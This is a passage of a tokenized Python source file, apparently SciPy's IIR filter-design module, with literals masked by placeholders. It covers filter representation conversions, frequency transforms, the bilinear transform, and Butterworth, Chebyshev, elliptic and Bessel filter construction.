imag > <NUM_LIT:0> , roots ) <EOL> neg_roots = numpy . conjugate ( numpy . compress ( roots . imag < <NUM_LIT:0> , roots ) ) <EOL> if len ( pos_roots ) == len ( neg_roots ) : <EOL> if numpy . all ( numpy . sort_complex ( neg_roots ) == <EOL> numpy . sort_complex ( pos_roots ) ) : <EOL> a = a . real . copy ( ) <EOL> return b , a <EOL> def tf2sos ( b , a , pairing = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return zpk2sos ( * tf2zpk ( b , a ) , pairing = pairing ) <EOL> def sos2tf ( sos ) : <EOL> """<STR_LIT>""" <EOL> sos = np . asarray ( sos ) <EOL> b = [ <NUM_LIT:1.> ] <EOL> a = [ <NUM_LIT:1.> ] <EOL> n_sections = sos . shape [ <NUM_LIT:0> ] <EOL> for section in range ( n_sections ) : <EOL> b = np . polymul ( b , sos [ section , : <NUM_LIT:3> ] ) <EOL> a = np . polymul ( a , sos [ section , <NUM_LIT:3> : ] ) <EOL> return b , a <EOL> def sos2zpk ( sos ) : <EOL> """<STR_LIT>""" <EOL> sos = np . asarray ( sos ) <EOL> n_sections = sos . shape [ <NUM_LIT:0> ] <EOL> z = np . empty ( n_sections * <NUM_LIT:2> , np . complex128 ) <EOL> p = np . empty ( n_sections * <NUM_LIT:2> , np . complex128 ) <EOL> k = <NUM_LIT:1.> <EOL> for section in range ( n_sections ) : <EOL> zpk = tf2zpk ( sos [ section , : <NUM_LIT:3> ] , sos [ section , <NUM_LIT:3> : ] ) <EOL> z [ <NUM_LIT:2> * section : <NUM_LIT:2> * ( section + <NUM_LIT:1> ) ] = zpk [ <NUM_LIT:0> ] <EOL> p [ <NUM_LIT:2> * section : <NUM_LIT:2> * ( section + <NUM_LIT:1> ) ] = zpk [ <NUM_LIT:1> ] <EOL> k *= zpk [ <NUM_LIT:2> ] <EOL> return z , p , k <EOL> def _nearest_real_complex_idx ( fro , to , which ) : <EOL> """<STR_LIT>""" <EOL> assert which in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> order = np . argsort ( np . abs ( fro - to ) ) <EOL> mask = np . isreal ( fro [ order ] ) <EOL> if which == '<STR_LIT>' : <EOL> mask = ~ mask <EOL> return order [ np . 
where ( mask ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> def zpk2sos ( z , p , k , pairing = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> valid_pairings = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if pairing not in valid_pairings : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( valid_pairings , pairing ) ) <EOL> if len ( z ) == len ( p ) == <NUM_LIT:0> : <EOL> return array ( [ [ k , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) <EOL> p = np . concatenate ( ( p , np . zeros ( max ( len ( z ) - len ( p ) , <NUM_LIT:0> ) ) ) ) <EOL> z = np . concatenate ( ( z , np . zeros ( max ( len ( p ) - len ( z ) , <NUM_LIT:0> ) ) ) ) <EOL> n_sections = ( max ( len ( p ) , len ( z ) ) + <NUM_LIT:1> ) // <NUM_LIT:2> <EOL> sos = zeros ( ( n_sections , <NUM_LIT:6> ) ) <EOL> if len ( p ) % <NUM_LIT:2> == <NUM_LIT:1> and pairing == '<STR_LIT>' : <EOL> p = np . concatenate ( ( p , [ <NUM_LIT:0.> ] ) ) <EOL> z = np . concatenate ( ( z , [ <NUM_LIT:0.> ] ) ) <EOL> assert len ( p ) == len ( z ) <EOL> z = np . concatenate ( _cplxreal ( z ) ) <EOL> p = np . concatenate ( _cplxreal ( p ) ) <EOL> p_sos = np . zeros ( ( n_sections , <NUM_LIT:2> ) , np . complex128 ) <EOL> z_sos = np . zeros_like ( p_sos ) <EOL> for si in range ( n_sections ) : <EOL> p1_idx = np . argmin ( np . abs ( <NUM_LIT:1> - np . abs ( p ) ) ) <EOL> p1 = p [ p1_idx ] <EOL> p = np . delete ( p , p1_idx ) <EOL> if np . isreal ( p1 ) and np . isreal ( p ) . sum ( ) == <NUM_LIT:0> : <EOL> z1_idx = _nearest_real_complex_idx ( z , p1 , '<STR_LIT>' ) <EOL> z1 = z [ z1_idx ] <EOL> z = np . delete ( z , z1_idx ) <EOL> p2 = z2 = <NUM_LIT:0> <EOL> else : <EOL> if not np . isreal ( p1 ) and np . isreal ( z ) . sum ( ) == <NUM_LIT:1> : <EOL> z1_idx = _nearest_real_complex_idx ( z , p1 , '<STR_LIT>' ) <EOL> assert not np . isreal ( z [ z1_idx ] ) <EOL> else : <EOL> z1_idx = np . argmin ( np . abs ( p1 - z ) ) <EOL> z1 = z [ z1_idx ] <EOL> z = np . delete ( z , z1_idx ) <EOL> if not np . 
isreal ( p1 ) : <EOL> if not np . isreal ( z1 ) : <EOL> p2 = p1 . conj ( ) <EOL> z2 = z1 . conj ( ) <EOL> else : <EOL> p2 = p1 . conj ( ) <EOL> z2_idx = _nearest_real_complex_idx ( z , p1 , '<STR_LIT>' ) <EOL> z2 = z [ z2_idx ] <EOL> assert np . isreal ( z2 ) <EOL> z = np . delete ( z , z2_idx ) <EOL> else : <EOL> if not np . isreal ( z1 ) : <EOL> z2 = z1 . conj ( ) <EOL> p2_idx = _nearest_real_complex_idx ( p , z1 , '<STR_LIT>' ) <EOL> p2 = p [ p2_idx ] <EOL> assert np . isreal ( p2 ) <EOL> else : <EOL> idx = np . where ( np . isreal ( p ) ) [ <NUM_LIT:0> ] <EOL> assert len ( idx ) > <NUM_LIT:0> <EOL> p2_idx = idx [ np . argmin ( np . abs ( np . abs ( p [ idx ] ) - <NUM_LIT:1> ) ) ] <EOL> p2 = p [ p2_idx ] <EOL> assert np . isreal ( p2 ) <EOL> z2_idx = _nearest_real_complex_idx ( z , p2 , '<STR_LIT>' ) <EOL> z2 = z [ z2_idx ] <EOL> assert np . isreal ( z2 ) <EOL> z = np . delete ( z , z2_idx ) <EOL> p = np . delete ( p , p2_idx ) <EOL> p_sos [ si ] = [ p1 , p2 ] <EOL> z_sos [ si ] = [ z1 , z2 ] <EOL> assert len ( p ) == len ( z ) == <NUM_LIT:0> <EOL> del p , z <EOL> p_sos = np . reshape ( p_sos [ : : - <NUM_LIT:1> ] , ( n_sections , <NUM_LIT:2> ) ) <EOL> z_sos = np . reshape ( z_sos [ : : - <NUM_LIT:1> ] , ( n_sections , <NUM_LIT:2> ) ) <EOL> gains = np . ones ( n_sections ) <EOL> gains [ <NUM_LIT:0> ] = k <EOL> for si in range ( n_sections ) : <EOL> x = zpk2tf ( z_sos [ si ] , p_sos [ si ] , gains [ si ] ) <EOL> sos [ si ] = np . concatenate ( x ) <EOL> return sos <EOL> def _align_nums ( nums ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> nums = asarray ( nums ) <EOL> if not np . issubdtype ( nums . dtype , np . number ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return nums <EOL> except ValueError : <EOL> nums = list ( nums ) <EOL> maxwidth = len ( max ( nums , key = lambda num : atleast_1d ( num ) . size ) ) <EOL> for index , num in enumerate ( nums ) : <EOL> num = atleast_1d ( num ) . 
tolist ( ) <EOL> nums [ index ] = [ <NUM_LIT:0> ] * ( maxwidth - len ( num ) ) + num <EOL> return atleast_1d ( nums ) <EOL> def normalize ( b , a ) : <EOL> """<STR_LIT>""" <EOL> b = _align_nums ( b ) <EOL> b , a = map ( atleast_1d , ( b , a ) ) <EOL> if len ( a . shape ) != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if len ( b . shape ) > <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if len ( b . shape ) == <NUM_LIT:1> : <EOL> b = asarray ( [ b ] , b . dtype . char ) <EOL> while a [ <NUM_LIT:0> ] == <NUM_LIT:0.0> and len ( a ) > <NUM_LIT:1> : <EOL> a = a [ <NUM_LIT:1> : ] <EOL> outb = b * ( <NUM_LIT:1.0> ) / a [ <NUM_LIT:0> ] <EOL> outa = a * ( <NUM_LIT:1.0> ) / a [ <NUM_LIT:0> ] <EOL> if allclose ( <NUM_LIT:0> , outb [ : , <NUM_LIT:0> ] , atol = <NUM_LIT> ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , BadCoefficients ) <EOL> while allclose ( <NUM_LIT:0> , outb [ : , <NUM_LIT:0> ] , atol = <NUM_LIT> ) and ( outb . shape [ - <NUM_LIT:1> ] > <NUM_LIT:1> ) : <EOL> outb = outb [ : , <NUM_LIT:1> : ] <EOL> if outb . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> outb = outb [ <NUM_LIT:0> ] <EOL> return outb , outa <EOL> def lp2lp ( b , a , wo = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> try : <EOL> wo = float ( wo ) <EOL> except TypeError : <EOL> wo = float ( wo [ <NUM_LIT:0> ] ) <EOL> d = len ( a ) <EOL> n = len ( b ) <EOL> M = max ( ( d , n ) ) <EOL> pwo = pow ( wo , numpy . 
arange ( M - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> start1 = max ( ( n - d , <NUM_LIT:0> ) ) <EOL> start2 = max ( ( d - n , <NUM_LIT:0> ) ) <EOL> b = b * pwo [ start1 ] / pwo [ start2 : ] <EOL> a = a * pwo [ start1 ] / pwo [ start1 : ] <EOL> return normalize ( b , a ) <EOL> def lp2hp ( b , a , wo = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> try : <EOL> wo = float ( wo ) <EOL> except TypeError : <EOL> wo = float ( wo [ <NUM_LIT:0> ] ) <EOL> d = len ( a ) <EOL> n = len ( b ) <EOL> if wo != <NUM_LIT:1> : <EOL> pwo = pow ( wo , numpy . arange ( max ( ( d , n ) ) ) ) <EOL> else : <EOL> pwo = numpy . ones ( max ( ( d , n ) ) , b . dtype . char ) <EOL> if d >= n : <EOL> outa = a [ : : - <NUM_LIT:1> ] * pwo <EOL> outb = resize ( b , ( d , ) ) <EOL> outb [ n : ] = <NUM_LIT:0.0> <EOL> outb [ : n ] = b [ : : - <NUM_LIT:1> ] * pwo [ : n ] <EOL> else : <EOL> outb = b [ : : - <NUM_LIT:1> ] * pwo <EOL> outa = resize ( a , ( n , ) ) <EOL> outa [ d : ] = <NUM_LIT:0.0> <EOL> outa [ : d ] = a [ : : - <NUM_LIT:1> ] * pwo [ : d ] <EOL> return normalize ( outb , outa ) <EOL> def lp2bp ( b , a , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> D = len ( a ) - <NUM_LIT:1> <EOL> N = len ( b ) - <NUM_LIT:1> <EOL> artype = mintypecode ( ( a , b ) ) <EOL> ma = max ( [ N , D ] ) <EOL> Np = N + ma <EOL> Dp = D + ma <EOL> bprime = numpy . zeros ( Np + <NUM_LIT:1> , artype ) <EOL> aprime = numpy . 
zeros ( Dp + <NUM_LIT:1> , artype ) <EOL> wosq = wo * wo <EOL> for j in range ( Np + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , N + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , i + <NUM_LIT:1> ) : <EOL> if ma - i + <NUM_LIT:2> * k == j : <EOL> val += comb ( i , k ) * b [ N - i ] * ( wosq ) ** ( i - k ) / bw ** i <EOL> bprime [ Np - j ] = val <EOL> for j in range ( Dp + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , D + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , i + <NUM_LIT:1> ) : <EOL> if ma - i + <NUM_LIT:2> * k == j : <EOL> val += comb ( i , k ) * a [ D - i ] * ( wosq ) ** ( i - k ) / bw ** i <EOL> aprime [ Dp - j ] = val <EOL> return normalize ( bprime , aprime ) <EOL> def lp2bs ( b , a , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> D = len ( a ) - <NUM_LIT:1> <EOL> N = len ( b ) - <NUM_LIT:1> <EOL> artype = mintypecode ( ( a , b ) ) <EOL> M = max ( [ N , D ] ) <EOL> Np = M + M <EOL> Dp = M + M <EOL> bprime = numpy . zeros ( Np + <NUM_LIT:1> , artype ) <EOL> aprime = numpy . 
zeros ( Dp + <NUM_LIT:1> , artype ) <EOL> wosq = wo * wo <EOL> for j in range ( Np + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , N + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , M - i + <NUM_LIT:1> ) : <EOL> if i + <NUM_LIT:2> * k == j : <EOL> val += ( comb ( M - i , k ) * b [ N - i ] * <EOL> ( wosq ) ** ( M - i - k ) * bw ** i ) <EOL> bprime [ Np - j ] = val <EOL> for j in range ( Dp + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , D + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , M - i + <NUM_LIT:1> ) : <EOL> if i + <NUM_LIT:2> * k == j : <EOL> val += ( comb ( M - i , k ) * a [ D - i ] * <EOL> ( wosq ) ** ( M - i - k ) * bw ** i ) <EOL> aprime [ Dp - j ] = val <EOL> return normalize ( bprime , aprime ) <EOL> def bilinear ( b , a , fs = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> fs = float ( fs ) <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> D = len ( a ) - <NUM_LIT:1> <EOL> N = len ( b ) - <NUM_LIT:1> <EOL> artype = float <EOL> M = max ( [ N , D ] ) <EOL> Np = M <EOL> Dp = M <EOL> bprime = numpy . zeros ( Np + <NUM_LIT:1> , artype ) <EOL> aprime = numpy . 
zeros ( Dp + <NUM_LIT:1> , artype ) <EOL> for j in range ( Np + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( N + <NUM_LIT:1> ) : <EOL> for k in range ( i + <NUM_LIT:1> ) : <EOL> for l in range ( M - i + <NUM_LIT:1> ) : <EOL> if k + l == j : <EOL> val += ( comb ( i , k ) * comb ( M - i , l ) * b [ N - i ] * <EOL> pow ( <NUM_LIT:2> * fs , i ) * ( - <NUM_LIT:1> ) ** k ) <EOL> bprime [ j ] = real ( val ) <EOL> for j in range ( Dp + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( D + <NUM_LIT:1> ) : <EOL> for k in range ( i + <NUM_LIT:1> ) : <EOL> for l in range ( M - i + <NUM_LIT:1> ) : <EOL> if k + l == j : <EOL> val += ( comb ( i , k ) * comb ( M - i , l ) * a [ D - i ] * <EOL> pow ( <NUM_LIT:2> * fs , i ) * ( - <NUM_LIT:1> ) ** k ) <EOL> aprime [ j ] = real ( val ) <EOL> return normalize ( bprime , aprime ) <EOL> def iirdesign ( wp , ws , gpass , gstop , analog = False , ftype = '<STR_LIT>' , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ordfunc = filter_dict [ ftype ] [ <NUM_LIT:1> ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % ftype ) <EOL> except IndexError : <EOL> raise ValueError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ftype ) <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> band_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> band_type += <NUM_LIT:1> <EOL> if wp [ <NUM_LIT:0> ] >= ws [ <NUM_LIT:0> ] : <EOL> band_type += <NUM_LIT:1> <EOL> btype = { <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' } [ band_type ] <EOL> N , Wn = ordfunc ( wp , ws , gpass , gstop , analog = analog ) <EOL> return iirfilter ( N , Wn , rp = gpass , rs = gstop , analog = analog , btype = btype , <EOL> ftype = ftype , output = output ) <EOL> def iirfilter ( N , Wn , rp = None , rs = None , btype = '<STR_LIT>' , analog = False , <EOL> ftype = '<STR_LIT>' , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> ftype , btype , 
output = [ x . lower ( ) for x in ( ftype , btype , output ) ] <EOL> Wn = asarray ( Wn ) <EOL> try : <EOL> btype = band_dict [ btype ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % btype ) <EOL> try : <EOL> typefunc = filter_dict [ ftype ] [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % ftype ) <EOL> if output not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( "<STR_LIT>" % output ) <EOL> if rp is not None and rp < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if rs is not None and rs < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if typefunc == buttap : <EOL> z , p , k = typefunc ( N ) <EOL> elif typefunc == besselap : <EOL> z , p , k = typefunc ( N , norm = bessel_norms [ ftype ] ) <EOL> elif typefunc == cheb1ap : <EOL> if rp is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> z , p , k = typefunc ( N , rp ) <EOL> elif typefunc == cheb2ap : <EOL> if rs is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> z , p , k = typefunc ( N , rs ) <EOL> elif typefunc == ellipap : <EOL> if rs is None or rp is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> z , p , k = typefunc ( N , rp , rs ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" % ftype ) <EOL> if not analog : <EOL> if numpy . any ( Wn < <NUM_LIT:0> ) or numpy . any ( Wn > <NUM_LIT:1> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> fs = <NUM_LIT> <EOL> warped = <NUM_LIT:2> * fs * tan ( pi * Wn / fs ) <EOL> else : <EOL> warped = Wn <EOL> if btype in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if numpy . 
size ( Wn ) != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2lp ( z , p , k , wo = warped ) <EOL> elif btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2hp ( z , p , k , wo = warped ) <EOL> elif btype in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> bw = warped [ <NUM_LIT:1> ] - warped [ <NUM_LIT:0> ] <EOL> wo = sqrt ( warped [ <NUM_LIT:0> ] * warped [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2bp ( z , p , k , wo = wo , bw = bw ) <EOL> elif btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2bs ( z , p , k , wo = wo , bw = bw ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" % btype ) <EOL> if not analog : <EOL> z , p , k = _zpkbilinear ( z , p , k , fs = fs ) <EOL> if output == '<STR_LIT>' : <EOL> return z , p , k <EOL> elif output == '<STR_LIT>' : <EOL> return zpk2tf ( z , p , k ) <EOL> elif output == '<STR_LIT>' : <EOL> return zpk2sos ( z , p , k ) <EOL> def _relative_degree ( z , p ) : <EOL> """<STR_LIT>""" <EOL> degree = len ( p ) - len ( z ) <EOL> if degree < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return degree <EOL> def _zpkbilinear ( z , p , k , fs ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> degree = _relative_degree ( z , p ) <EOL> fs2 = <NUM_LIT:2> * fs <EOL> z_z = ( fs2 + z ) / ( fs2 - z ) <EOL> p_z = ( fs2 + p ) / ( fs2 - p ) <EOL> z_z = append ( z_z , - ones ( degree ) ) <EOL> k_z = k * real ( prod ( fs2 - z ) / prod ( fs2 - p ) ) <EOL> return z_z , p_z , k_z <EOL> def _zpklp2lp ( z , p , k , wo = <NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_lp = wo * z <EOL> p_lp = wo * p <EOL> k_lp = k * wo ** degree <EOL> return z_lp , p_lp , k_lp <EOL> def _zpklp2hp ( z , p , k , wo = 
<NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_hp = wo / z <EOL> p_hp = wo / p <EOL> z_hp = append ( z_hp , zeros ( degree ) ) <EOL> k_hp = k * real ( prod ( - z ) / prod ( - p ) ) <EOL> return z_hp , p_hp , k_hp <EOL> def _zpklp2bp ( z , p , k , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> bw = float ( bw ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_lp = z * bw / <NUM_LIT:2> <EOL> p_lp = p * bw / <NUM_LIT:2> <EOL> z_lp = z_lp . astype ( complex ) <EOL> p_lp = p_lp . astype ( complex ) <EOL> z_bp = concatenate ( ( z_lp + sqrt ( z_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> z_lp - sqrt ( z_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> p_bp = concatenate ( ( p_lp + sqrt ( p_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> p_lp - sqrt ( p_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> z_bp = append ( z_bp , zeros ( degree ) ) <EOL> k_bp = k * bw ** degree <EOL> return z_bp , p_bp , k_bp <EOL> def _zpklp2bs ( z , p , k , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> bw = float ( bw ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_hp = ( bw / <NUM_LIT:2> ) / z <EOL> p_hp = ( bw / <NUM_LIT:2> ) / p <EOL> z_hp = z_hp . astype ( complex ) <EOL> p_hp = p_hp . 
astype ( complex ) <EOL> z_bs = concatenate ( ( z_hp + sqrt ( z_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> z_hp - sqrt ( z_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> p_bs = concatenate ( ( p_hp + sqrt ( p_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> p_hp - sqrt ( p_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> z_bs = append ( z_bs , + <NUM_LIT> * wo * ones ( degree ) ) <EOL> z_bs = append ( z_bs , - <NUM_LIT> * wo * ones ( degree ) ) <EOL> k_bs = k * real ( prod ( - z ) / prod ( - p ) ) <EOL> return z_bs , p_bs , k_bs <EOL> def butter ( N , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def cheby1 ( N , rp , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , rp = rp , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def cheby2 ( N , rs , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , rs = rs , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def ellip ( N , rp , rs , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , rs = rs , rp = rp , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def bessel ( N , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' , norm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' + norm ) <EOL> def maxflat ( ) : <EOL> pass <EOL> def yulewalk ( ) : <EOL> pass <EOL> def band_stop_obj ( wp , ind , passb , stopb , gpass , gstop , type ) : <EOL> """<STR_LIT>""" <EOL> passbC = passb . 
copy ( ) <EOL> passbC [ ind ] = wp <EOL> nat = ( stopb * ( passbC [ <NUM_LIT:0> ] - passbC [ <NUM_LIT:1> ] ) / <EOL> ( stopb ** <NUM_LIT:2> - passbC [ <NUM_LIT:0> ] * passbC [ <NUM_LIT:1> ] ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> if type == '<STR_LIT>' : <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> n = ( log10 ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) / ( <NUM_LIT:2> * log10 ( nat ) ) ) <EOL> elif type == '<STR_LIT>' : <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> n = arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) / arccosh ( nat ) <EOL> elif type == '<STR_LIT>' : <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gstop ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gpass ) <EOL> arg1 = sqrt ( ( GPASS - <NUM_LIT:1.0> ) / ( GSTOP - <NUM_LIT:1.0> ) ) <EOL> arg0 = <NUM_LIT:1.0> / nat <EOL> d0 = special . ellipk ( [ arg0 ** <NUM_LIT:2> , <NUM_LIT:1> - arg0 ** <NUM_LIT:2> ] ) <EOL> d1 = special . 
ellipk ( [ arg1 ** <NUM_LIT:2> , <NUM_LIT:1> - arg1 ** <NUM_LIT:2> ] ) <EOL> n = ( d0 [ <NUM_LIT:0> ] * d1 [ <NUM_LIT:1> ] / ( d0 [ <NUM_LIT:1> ] * d1 [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % type ) <EOL> return n <EOL> def buttord ( wp , ws , gpass , gstop , analog = False ) : <EOL> """<STR_LIT>""" <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> filter_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> filter_type += <NUM_LIT:1> <EOL> if wp [ <NUM_LIT:0> ] >= ws [ <NUM_LIT:0> ] : <EOL> filter_type += <NUM_LIT:1> <EOL> if not analog : <EOL> passb = tan ( pi * wp / <NUM_LIT> ) <EOL> stopb = tan ( pi * ws / <NUM_LIT> ) <EOL> else : <EOL> passb = wp * <NUM_LIT:1.0> <EOL> stopb = ws * <NUM_LIT:1.0> <EOL> if filter_type == <NUM_LIT:1> : <EOL> nat = stopb / passb <EOL> elif filter_type == <NUM_LIT:2> : <EOL> nat = passb / stopb <EOL> elif filter_type == <NUM_LIT:3> : <EOL> wp0 = optimize . fminbound ( band_stop_obj , passb [ <NUM_LIT:0> ] , stopb [ <NUM_LIT:0> ] - <NUM_LIT> , <EOL> args = ( <NUM_LIT:0> , passb , stopb , gpass , gstop , <EOL> '<STR_LIT>' ) , <EOL> disp = <NUM_LIT:0> ) <EOL> passb [ <NUM_LIT:0> ] = wp0 <EOL> wp1 = optimize . 
